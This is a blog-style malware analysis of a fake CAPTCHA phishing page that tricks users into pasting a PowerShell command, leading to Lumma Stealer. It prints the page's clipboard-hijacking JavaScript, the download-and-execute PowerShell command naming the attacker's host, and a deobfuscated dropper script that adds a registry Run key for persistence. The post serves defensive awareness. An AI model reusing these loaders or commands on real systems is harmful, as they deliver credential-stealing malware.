The Anatomy of a "Paste n Run" Phishing Attack
The Anatomy of a “Paste n Run” Phishing Attack
Have you ever clicked on a download link only to end up somewhere unexpected? That’s exactly what happened to me recently, and it led me down a rabbit hole of cyber threats. What I discovered was a phishing technique is called the “Paste n Run” attack. Let’s dive into how it works and why it’s so dangerous.
It all started when I tried to download something from a website (let’s keep that part between us, shall we?). Suddenly, I was redirected to a suspicious site that looked like this :
At first glance, it seemed like a typical CAPTCHA check. But a closer look at the page’s source code revealed something far more sinister :
## Verify You Are Human
Please verify that you are a human to continue.
I'm not a robot
### Verification Steps
1. Press Windows Button "" + R
2. Press CTRL + V
3. Press Enter
function verify() {
const textToCopy = "powershell.exe -W Hidden -command $url = 'https://finalsteptogo.com/uploads/tr9.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text";
const tempTextArea = document.createElement("textarea");
tempTextArea.value = textToCopy;
document.body.appendChild(tempTextArea);
tempTextArea.select();
document.execCommand("copy");
document.body.removeChild(tempTextArea);
const recaptchaPopup = document.getElementById("recaptchaPopup");
const overlay = document.getElementById("overlay");
recaptchaPopup.classList.add("active");
overlay.classList.add("active");
}
const verifyButton = document.getElementById('verifyButton');
verifyButton.addEventListener('click', verify);
This code sets up a trap. When a user clicks the “I’m not a robot” button, it doesn’t actually verify anything. Instead, it copies a malicious PowerShell command to the user’s clipboard and shows a popup with instructions to run it.
After clicking the button, users see this popup :
The instructions appear harmless but they’re actually tricking users into running the malicious code that was secretly copied to their clipboard. Those steps actually do :
- “Press Windows Button + R” opens the Run dialog.
- “Press CTRL + V” pastes the malicious PowerShell command.
- “Press Enter” executes the command.
Of course, we won’t do that. But curiosity got the better of me, so I decided to investigate further. I downloaded the tr9.txt file mentioned in the PowerShell command and found it contained obfuscated code
After some work, I managed to deobfuscate and commented the code as follows :
# initialize several variable
$sourceUrl = 'https://finalsteptogo.com/uploads/tera9.zip'
$directoryPath = $env:APPDATA + '\L47qarQ7'
$zipFilePath = $env:APPDATA + '\UUmw5Myt.zip'
$executablePath = $directoryPath + '\Set-up.exe'
# check if the directory exists, and create it if it doesn't exist
if (-not (Test-Path $directoryPath)) {
New-Item -Path $directoryPath -ItemType Directory
}
# this line of code will download the zip file
Start-BitsTransfer -Source $sourceUrl -Destination $zipFilePath
# after being downloaded, the code will extract the contents of the zip file
Expand-Archive -Path $zipFilePath -DestinationPath $directoryPath -Force
# and then, it will remove the downloaded zip file
Remove-Item $zipFilePath
# the extracted executable is being started
Start-Process $executablePath
# set the executable to run at startup by adds a registry entry
New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'K6kTgJql' -Value $executablePath -PropertyType 'String'
This script downloads a zip file, extracts its contents, runs an executable, and sets it to start automatically when the computer boots up. This persistence mechanism is one reason why malware can stick around for so long
Curious about what was in that zip file, I downloaded tera9.zip and scanned it with VirusTotal. The results were alarming - multiple security vendors flagged it as malicious, identifying it as a trojan and infostealer
Further investigation using Any.Run (a malware analysis sandbox) revealed that this malware is associated with Lumma Stealer — a sophisticated information stealer written in C and distributed through Malware-as-a-Service (MaaS) platforms
Lumma Stealer is particularly dangerous because it targets :
- Cryptocurrency wallets
- Login credentials
- Other sensitive information on infected systems
What makes it even more dangerous is its ability to update itself, potentially expanding its functionality over time.
When I extracted tera9.zip, I found a complex directory structure :
$ tree [7:34:39]
.
├── Set-up.exe
├── config.prx
├── khkgvv
├── madbasic_.bpl
├── maddisAsm_.bpl
├── madexcept_.bpl
├── nxwvh
├── opengl64.dll
├── rtl120.bpl
├── updater
│ ├── NvStWiz.prx
│ └── manager
│ └── ks_tyres.ini
├── vcl120.bpl
├── vclx120.bpl
├── x64
│ ├── trading_api64.dll
│ └── tradingnetworkingsockets.dll
└── x86
├── api-ms-win-core-processthreads-l1-1-1.dll
├── api-ms-win-core-profile-l1-1-0.dll
├── api-ms-win-core-rtlsupport-l1-1-0.dll
├── api-ms-win-core-string-l1-1-0.dll
├── api-ms-win-core-synch-l1-1-0.dll
├── api-ms-win-core-synch-l1-2-0.dll
├── api-ms-win-core-sysinfo-l1-1-0.dll
├── api-ms-win-core-timezone-l1-1-0.dll
├── api-ms-win-core-util-l1-1-0.dll
├── api-ms-win-crt-conio-l1-1-0.dll
├── api-ms-win-crt-convert-l1-1-0.dll
├── api-ms-win-crt-environment-l1-1-0.dll
├── api-ms-win-crt-filesystem-l1-1-0.dll
├── api-ms-win-crt-heap-l1-1-0.dll
├── api-ms-win-crt-locale-l1-1-0.dll
├── api-ms-win-crt-math-l1-1-0.dll
├── api-ms-win-crt-multibyte-l1-1-0.dll
├── api-ms-win-crt-private-l1-1-0.dll
└── api-ms-win-crt-process-l1-1-0.dll
4 directories, 34 files
This structure includes:
- The main executable (
Set-up.exe) - Configuration files
- Borland Package Library (BPL) files (suggesting it’s a Delphi-based application)
- An updater mechanism
- Various DLLs for both 32-bit and 64-bit systems
When I uploaded the suspicious files to VirusTotal, I discovered that Set-up.exe was actually named ScreenShot.exe and nxwvh was related to an ISO image
Interestingly, the nxwvh file was found in several other “tera” files (tera9, tera10, tera14), suggesting this malware might be part of a larger campaign
So, what’s the big takeaway from all this “Paste n Run” phishing stuff? Well, it’s a pretty wild ride from a simple “Are you a robot?” check to a full-blown malware attack. This Lumma Stealer is no joke — it’s like a chameleon, always changing and getting sneakier
But here’s the kicker: even the smartest malware needs you to do something for it to work. It’s like a vampire — it can’t get in unless you invite it. That’s why it’s super important for all of us to stay on our toes when we’re online
Next time you see a weird prompt asking you to run some command or click some sketchy link, take a step back and think, “Wait a minute, does this smell fishy?” It’s okay to be a little paranoid online — better safe than sorry, right?
Keep your antivirus up to date, maybe learn a bit about online safety, and trust your gut when something seems off. Remember, in the online world, you’re your own best bodyguard. Stay sharp, stay curious, and when in doubt, just don’t click!
To avoid falling victim to attacks like this :
- Be skeptical of any website asking you to run commands or paste code
- Keep your operating system and antivirus software up to date
- Don’t download files from untrusted sources
- Use a password manager and enable two-factor authentication where possible
- Educate yourself about common phishing techniques
Stay safe out there, guys!